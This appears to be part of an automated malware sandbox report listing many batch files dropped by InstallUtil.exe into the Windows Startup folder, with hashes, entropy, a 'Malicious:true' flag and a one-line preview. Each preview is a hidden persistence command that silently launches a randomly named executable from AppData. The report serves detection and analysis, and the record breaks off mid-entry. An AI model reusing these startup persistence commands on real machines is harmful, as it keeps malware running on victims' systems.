                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0vemidTikN0VMvyyqgfUpM9G.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.8300996263592575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5NRoEN1BEMsULNSkdan:fE1wkn23DFB31LNSD
                                                                                                                                                                                                                                MD5:C2D21EA7C463FAC3F9AE11C050DE935E
                                                                                                                                                                                                                                SHA1:F55DAA9190E216170628E6ED0F4AD7DA3F29E118
                                                                                                                                                                                                                                SHA-256:76114212E85D53EE470BB24743BCBE2CFB7202FA2E8938415F6FCE54D1B7EDF1
                                                                                                                                                                                                                                SHA-512:E7664B3F6306EED202D1B57ABB964AD9C47A0B2E9F2E2EC1EAF3175F8BE025E8E4A002B72A2061BBB8EBBD2998122DD3E0ACEC182F7F2047B6F533805CFB286F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\htMajCePjPdapCkAov1lc8J9.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15kxO4axYz87tjx2F18yoEOB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526514
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rHS0Ux71ETJl:fE1wkn23bStxitl
                                                                                                                                                                                                                                MD5:CADAA6DC1EFC3D85BC1661F1D3D48BE2
                                                                                                                                                                                                                                SHA1:BB9119B1133B0CECD551CE80EDC8B4179E6A8B2B
                                                                                                                                                                                                                                SHA-256:8972EBE6A22E2B70DD46A5782028D40E2C8AEC03C7A0BBF1FEE74D829BA25E62
                                                                                                                                                                                                                                SHA-512:B0D4B53C79CDDDB004B618C3C415077069337A358BE7B34D8B154C41A8DCFEA6E3C1725E4BDB07567AC5BA5FFCA76294CB56FC67E9ED6714EB5BC99CFD10B1AD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NqsfoMYypS05t81TJmKPA8xv.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\296oUdYAJhNvgZMPkFJ8Adyi.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.825039002236954
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5kcfCjLjkA4Eykdan:fE1wkn23kuCSEyD
                                                                                                                                                                                                                                MD5:A2D9BF55162A6CB45A39D6F27490A683
                                                                                                                                                                                                                                SHA1:395AE5D47E226EED890B12898FE5D904FC53C47B
                                                                                                                                                                                                                                SHA-256:49662BD278937B1333ABB290185E33D3E42B42D62FC81F5B3BDECD06506C206E
                                                                                                                                                                                                                                SHA-512:C2FF4AF80292E832499C26E125B6997DE1B316C05638C2CA8A609F2DB8410BD7F93984E743A7BE9C9A1E8C808A5A7542A01C165108461269552B9D9095F0870D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\AdDlHuzgF8lFUsmxcjVFtutw.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2BAkuvvH6sPJYNmpYSkgEcI5.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.950925862851686
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DXyCvYsXRsLv:fE1wkn23Ly/2y
                                                                                                                                                                                                                                MD5:8123D87096D688A37AB37537AA691871
                                                                                                                                                                                                                                SHA1:095899F5A516ABAB6D4A5CAD25627C8036C6F61B
                                                                                                                                                                                                                                SHA-256:2F5C925CE12E8930BC417A4C11C0BB4E71FFB746FBEEDD942BE9242C0E795591
                                                                                                                                                                                                                                SHA-512:2935297549984CEA3F71C1BA731C2124658623CFA9BB104A122A136D230547563300789C8CE086A2156B93AF147897803B9D85F9BAFF08352E8FC6E330D3FD4A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\f2hw2VKIAGcHQqAtIrjN8igU.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2JYRr5VJQzScOorgs63t6Yms.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.066867891837192
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SLnQrl99Lw4m:fE1wkn23ST4Rw4m
                                                                                                                                                                                                                                MD5:241BDD5724B5584F07F514210EEAC753
                                                                                                                                                                                                                                SHA1:E68BF52974D26E280956FC50F14D0A3B19670F0D
                                                                                                                                                                                                                                SHA-256:7DFD41489C6B054D1844B85B40009F48E12A32D102625822D30C50A9E0E70C1D
                                                                                                                                                                                                                                SHA-512:15C5A5B89C287A107ACC1252951E2D34938A926D67C1994F2580DF4D69E7C391960B93B9F742219962F7E4D349AA6334161656DA2599838964418622D1C4BD43
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\7nBui7yHWFndJbxXyvMi3Z9f.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2ivxKjIFzltkDEA2JxwPp8hh.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.0035382418621825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WzhRQDdWHRn9NNlIkdan:fE1wkn23WzhUmn9PSD
                                                                                                                                                                                                                                MD5:67E36149535C8A8C09461B3E1EE53522
                                                                                                                                                                                                                                SHA1:D53E42D5DCAD3A91D7D5E1D57BB53C16D98A365A
                                                                                                                                                                                                                                SHA-256:1811C6F798FAEC87F364E47B24F99695438B16B0496AA730F8436DC856C8FCD8
                                                                                                                                                                                                                                SHA-512:510652666C99F7F4F90F5BADF3536757D7D633B3C39F7CCEFE17FB889370774C5E3249BF33757A2DCE7BACF22E2C6901BDE415FFA18E30993AB162FC9C9FBFA2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\sI7dZrzWguf80YTd4w1tJlxT.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4golg26ok3AkC3sMSeZWrCjO.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.802162638119942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5CZR0SvZAdiFn:fE1wkn23CZR05m
                                                                                                                                                                                                                                MD5:ADC59C16D8DD836094981119D4BD9AE3
                                                                                                                                                                                                                                SHA1:F1E80C9B703A88859A96EB2C9A7627F72C621495
                                                                                                                                                                                                                                SHA-256:6EC92CD045617B49575466F348B32089F1590C5D7CBC2F6CAE3AE23BBAED248D
                                                                                                                                                                                                                                SHA-512:9FFF75986DC086FC269BE4070F25A4E1550B9B4B6D818231AB9FDF1087FB1CC469802E35E92C213D6082FE95A6F301F75C729DFD670BCC2AD44C2E01CB9F798E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\gEy33b1wzb5JaeAUext9FbaV.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\50beuzNCvSVaMrqSOp6IcdAU.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.829700819712553
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J50tbpiGO12As:fE1wkn230NM0v
                                                                                                                                                                                                                                MD5:020D843F8578F6B3C3C2AE94394E91FB
                                                                                                                                                                                                                                SHA1:B671C653A83FD919F38074B9F268900D35E644FC
                                                                                                                                                                                                                                SHA-256:49D034E00EA395FBDECDB629D327887D86682877ACDEF542A72CF395120660B6
                                                                                                                                                                                                                                SHA-512:C469F85DD6FFEDEC8663AF0682A75D00184F73146F1187484531CA136891AC2B8EBA9BAEF7F0C130268EB56852C975196B86D81CB0AB3A521ACE1ABC31838D7B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\QHmCOGrGcBV6cGjqniLiFdsr.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zhgboFgxJ3Uc89yF9kUFaaB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.071959208087219
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Tp2eBPy8kdan:fE1wkn23jD
                                                                                                                                                                                                                                MD5:E35B2F7C901715A3330B6734E7FFAF0F
                                                                                                                                                                                                                                SHA1:A39EA5CE0FE0159F705D0EFC4294C637274895DE
                                                                                                                                                                                                                                SHA-256:200BB4ADAD3D4948EE5FB5FE50F893836D4064583791074B25CEFE3125E27BA7
                                                                                                                                                                                                                                SHA-512:CA25B6C01713FA2E0B8D192405A10E4CE9184B4BBC96E8952C690A7824EFBD16B0F959F5AB55EB20E41375E5D9C083C547A4DCC16BEF7E5061D8DA48D4A9A01B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6YVbkJ2dbTU6iPJjmiDFc28v.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.93470245011598
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5sYbyUZSldumn:fE1wkn23s85+dN
                                                                                                                                                                                                                                MD5:B1077B9413C7BBAC2C3E6FFCB72BBAFF
                                                                                                                                                                                                                                SHA1:96CEB8E9C75CDBC6A12E3BF6E5BA829735EF081E
                                                                                                                                                                                                                                SHA-256:BBF00A7FEC6BCF4777E84AB0CD2F05132B2905091E98D05F78A86D0BECB8D35D
                                                                                                                                                                                                                                SHA-512:EB218A64634E780A4768E1CD9A0EFE1BC23A6C0E5C0F49F92D94EA954F3482DD848BF9F458040B60975DC93529CF79789FC1B22FDACB220F435F41A1877F64D5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\IfzaP4WqQEdUcGlnXuUZNlcC.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ay5F8eKgrG8lBN1EHxrDj9a.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.842088543948398
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5j22BB+dAl:fE1wkn23Z4dAl
                                                                                                                                                                                                                                MD5:87BB5AB061425884B4829F9A948A991C
                                                                                                                                                                                                                                SHA1:DE8E1D0BDA09FAEED4392A798053E35CB7DB7FC3
                                                                                                                                                                                                                                SHA-256:D79E7CD2C322C640DA978ED2D9AE7230782E690F7FF046E4576E6CB0EF0FBF51
                                                                                                                                                                                                                                SHA-512:0AADB583184EE0EBD478F21ADEC481BE100431474BEE6D18B4E4536919F6FE5455433A6788B3049F8A6CE51BA5B4AE4D7A241626986465E7526E74CF83BEBD7A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FIE2EI26EI4jGGv0xJtpXxXh.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6dNGtLUaCGiNt5X3GAVfN2mx.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.043539769019268
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rZm4mCJln:fE1wkn23k4ll
                                                                                                                                                                                                                                MD5:6B979B9A5F5ADC5E75D5A8F5A8481826
                                                                                                                                                                                                                                SHA1:0328A85B5D24FE2EA042973C073B540BA7F21819
                                                                                                                                                                                                                                SHA-256:C640B2EB0A58FBC72DA427F16363B9D2EE8277922758109D418DFF88F8E05290
                                                                                                                                                                                                                                SHA-512:411B98C0F2DC37F9681D27BBC59E6598C7CE42D14FBA3F338F2F3D43BFE6017A4B3E592C8F4E29BB9C0B8B3C0761527698CE577945A555D57017FB2F8D01EAC4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NIrszCqD63mWfcibv0YdSwFl.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BA8WVult1sLOauGc9twvjXt.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.731803899391344
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5XkuQrq1+ybkLACln:fE1wkn23041+yPs
                                                                                                                                                                                                                                MD5:AD1EAAF77E0BE5B1D200C867FA82D447
                                                                                                                                                                                                                                SHA1:2BE78F58B50929400D0648E1A635128561607BA7
                                                                                                                                                                                                                                SHA-256:3A5487F9079D1FEC5AB1ACFA6E51EFE35AD304557959F7C92583C5EC830BFF2E
                                                                                                                                                                                                                                SHA-512:CCD0B42CA535E32A4C8805EA34B96C914A1BBDBF063FA49BC1D9A6239B5667CDBE63D5E3B8932FFE4053AC50831C5CC44B8639CFCA8AD2208F7B1D5C260CB9BF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\rE439KsrV4PvRPEPLReHeUKA.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7XCwIQMtq8JrfsfhMk9tIIOj.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526514
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5c0tOervJln:fE1wkn23c0bJl
                                                                                                                                                                                                                                MD5:A6F47C5157691D7B88DD5C986DCE6356
                                                                                                                                                                                                                                SHA1:331E925592A5EED9DB036224BA287C86AD50F9DE
                                                                                                                                                                                                                                SHA-256:5C848559CE662EE76D41E9B19C8750E67AAA41BB6CB7FFE12290BC9A2D349343
                                                                                                                                                                                                                                SHA-512:C32E3896E007806D02682D25232FCD56B6BD97DA592F6ED2028D1C1B3AC1399F2C73B60791640D9B34D55A77CCAF68C33599018DFB5C660CD2A2121F2BE5E056
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\9ufe1gHGCTbQcgch0LWJNHFl.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8952IHdifzCOHTQvuvHXTJ1g.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.806372696894626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5BQSIE1WJGEgiT:fE1wkn23TInJGYT
                                                                                                                                                                                                                                MD5:C20D38EF2AEC0DC7D1CF578CE449A669
                                                                                                                                                                                                                                SHA1:F1890D5FDFD4737000022FFFCA82A44FEEBBB3C8
                                                                                                                                                                                                                                SHA-256:4784313143A861B5FD0C35168263B3F3240300BC1E0A25E839C445FD6ED95C05
                                                                                                                                                                                                                                SHA-512:3271F3368461E775D3B9DFB36E4044EEF4618E1C9C35119E3538465AD5AFF986D9E148A7FE7D386202E052B24798C74F27DA25D9FC41E7811BDB35EFFC164AC8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\d5GRgSmaPslr3qxE59r0Grrj.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\91FjtG5d8Mu7R0hZFaoE9YuL.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.951300233126509
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5AMYLHHUCOSc0s:fE1wkn23A9LnUC+L
                                                                                                                                                                                                                                MD5:F4476535F053EC7696330B81E14E2DC9
                                                                                                                                                                                                                                SHA1:58F53EF1A69C0467F4CC69857DC9F3B291F45277
                                                                                                                                                                                                                                SHA-256:8F12F8BD2903C8899CEF4F4917A059CF37B448CFB60510B2CA1FE5DAFFBFFFFC
                                                                                                                                                                                                                                SHA-512:0C7712A46CDD7FF4D1C38E99B1E6B2A7E04633CC37273B7F5221F87460C341AC36197ABC653B59B6512B98DB890DC181C3424ACBCCAD7AF7073CC795B0B8C1BD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\eyAi0JyfnnbOWWs1ZPEHdG7y.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\99X2MvCoXuwU3tttFIPQHwHV.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.764999465412405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5t1PRtWBkpgn:fE1wkn23HPRt1pg
                                                                                                                                                                                                                                MD5:E83C7809992CE380BE5D03E8C226D04F
                                                                                                                                                                                                                                SHA1:F130B07297C078EE1F69CF36CCA1C09C5BD366C7
                                                                                                                                                                                                                                SHA-256:698E8152271BC32DF16A88177AAA7F9901F8C7D3442F514CD3EA301A88C35576
                                                                                                                                                                                                                                SHA-512:13990CB0110DC015FA420B1CD75569351278F672B973792C53CA5A71FF31474F5D35206BAD6DFAE46E2ABDED850689F1DC02F56AE05FCEAC74FA3228EBEC3E62
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\HPykbtSofo4ieesmLEyEOoa7.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6JhBFTT0ahcL4Jx3VU57fvL.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WNGsXqTh:fE1wkn23WNGF
                                                                                                                                                                                                                                MD5:83E90E2350B0450EF8D4410E52CC1B2E
                                                                                                                                                                                                                                SHA1:83D7E01FBCE17731B989465989C2F889DDEDD56D
                                                                                                                                                                                                                                SHA-256:35212B688252AE0163529F192BA1E6DD11DA61995FB0D6F0EDA8C2C20E2DF460
                                                                                                                                                                                                                                SHA-512:598FE754C6D4CDDF04009FF39CEDEAB8FA4279C98404EB72C7215CCE7A482A6DFA5381859A1F29DA4EA01B989A6B2DC81D5DDC61C0A28BCBCF6697B8C24BA1C0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\30eZAb709eOPYHi1pUuH6yc8.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BG4uaPJ9Dk2ZtFkFmXZqJQN5.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.968970971515983
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5cxtA/J1n:fE1wkn23cxtAJ1
                                                                                                                                                                                                                                MD5:8D75173387E0BF2F2935F70E5C15C6CC
                                                                                                                                                                                                                                SHA1:FDB42DDADB411EF6D41653BAA263C0740F90E3F5
                                                                                                                                                                                                                                SHA-256:1DDFEB3937C5AB349EE2A96B70A55B175107C71A13E7DAFE719EE94ACB920FA3
                                                                                                                                                                                                                                SHA-512:EC1AF705FF2744B3766F33CCBE93FDC8EFAB088F29257CCF2C38DEB2E42468F5C923B731DE3E9D8ED0BC64F624EEB4381C7037295E1DA90CD5FD772A373054D6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ynI9MlCoK2uCu7iRPFKyVbhb.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C5bXmg8WFq8GqSN4su9KEIhK.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.926187924989845
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SyfuPP6X2L/kdan:fE1wkn23SyoiXOD
                                                                                                                                                                                                                                MD5:B88F7F3FBFC6CC715BC3B223D613A2BC
                                                                                                                                                                                                                                SHA1:F3377035DD1E1958CE6A7D152C3019E9B77C4992
                                                                                                                                                                                                                                SHA-256:E074D0FAB7C45633187BA9FF16FCD5743E7D8E3E1B8F25BDFC99D6DEB86F619A
                                                                                                                                                                                                                                SHA-512:EF821E818658D0BC9795655C608ED24649B889F1FD9A46ECC943A860369C35C3FEE3181EC5A28AE8A2BBA07B23F8CB7969B38281B9C8613DF746290DE019F6D4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.782670203801878
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5VdHqjx22MtYNHFn:fE1wkn233KjMYNl
                                                                                                                                                                                                                                MD5:52CF1EF997EC58F90901E251D3120BF8
                                                                                                                                                                                                                                SHA1:A013540B429C17553E97F1DC062E57E7049DD825
                                                                                                                                                                                                                                SHA-256:89175362078274595D1ED1BF9C40E6526ABF0DCCB294B98CBB6916A9A0F3DCAA
